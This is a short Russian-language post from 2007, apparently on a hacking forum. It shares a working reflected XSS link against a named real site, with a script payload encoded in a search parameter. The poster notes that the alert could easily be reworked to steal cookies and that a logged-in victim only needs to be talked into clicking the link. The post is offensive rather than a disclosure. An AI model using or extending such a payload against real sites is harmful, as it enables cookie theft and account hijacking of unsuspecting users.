
18.03.2007, 11:31
|
|
Познающий
Регистрация: 22.11.2006
Сообщений: 68
Провел на форуме: 682079
Репутация:
137
|
|
XSS после входа под регарым юзером.
http://c5.one.lv/navigate.do?st.id=community.ownfriends.page&st.fri e nds.fl.search=%22%3E%3Cscript%3Ealert%28"XSS"%29%3 C%2Fscript%3E
Это выведет простой алерт. Нет ничего сложного немного доработать и увести кукисы.
Только надо юзеру впарить нужную ссылку и попросить нажать )
Последний раз редактировалось Koller; 19.03.2007 в 10:57..
|
|
|